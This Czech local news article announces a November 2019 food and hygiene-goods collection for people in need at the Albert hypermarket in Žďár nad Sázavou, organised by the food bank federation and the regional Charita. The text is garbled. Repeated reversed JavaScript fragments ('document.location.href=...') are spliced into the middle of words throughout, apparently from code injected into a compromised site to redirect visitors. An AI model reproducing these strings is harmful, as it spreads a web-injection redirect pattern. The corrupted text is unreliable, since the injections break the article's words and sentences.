Rainbow page separator

Sbírka potravin pomůže lidem v nouzi prožít klidné svátky

Pondělí, 18. listopadu 2019

Žďár nad Sázavou / Ve žďárském Hypermarketu Albert se v sobotu 23. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu od 8 do 18 hodin uskuteční potravinová sbírka. Veřejnost může pomoci nákupem vybraných trvanlivých potravin, jako jsou těs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviny, rýže, luštěniny, konzervy, dětská výživa, trvanlivé mléko, olej, cukr, puding, mouka, polévky, paštiky či ovocné přesnídávky. Lidé mohou zakoupit i základní drogistické potřeby – mýdlo, šampon, zubní pasty a kartáčky, prací prostředky, prostředky na mytí nádobí a úklid, vlhčené ubrousky, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toaletní papír či dětské pleny. Sbírku organizuje Česká federace potravinových bank, přičemž Oblastní charita Žďár nad Sázavou se do ní připojuje coby partner.
„Každý, kdo se bude chtít zapojit v pomoci potřebným, může zakoupit jakékoliv zboží ze seznamu a v prodejně je zanechat našim dobrovolníkům. Pro ty, kteří nemají v začínajícím předvánočním shonu čas na nákupy, bude připravena kasička, do které mohou vhodit peníze,“ upřesnila koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka potravinové sbírky pro Oblastní charitu Žďár nad Sázavou Michaela Kuch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová.
Získaná pomoc podpoří především klienty takzvané charitní záchranné sítě – služby oblastní charity, kteří čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vypadávají ze systému podpory a pomoci institucí a dalších služeb, nebo je ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pomoc pro ně nedostatečná. Jako dobrovolní organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři se do sobotní akce zapojí členové FC ŽĎAS Žďár nad Sázavou. „Jsme moc rádi, že jsme byli osloveni a že se budeme moci prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat na jiném poli, než je fotbalové, a ještě přispějeme pro dobrou věc. Dali jsme dohromady šestnáctičlenný tým složený z hráčů dorosteneckého věku, trenérů a funkcionářů,“ uvedl manažer klubu Radim Chmelíček.